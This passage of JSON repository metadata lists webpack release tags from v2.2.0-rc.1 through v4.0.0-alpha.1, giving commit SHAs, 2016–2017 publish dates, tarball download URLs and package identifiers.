v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz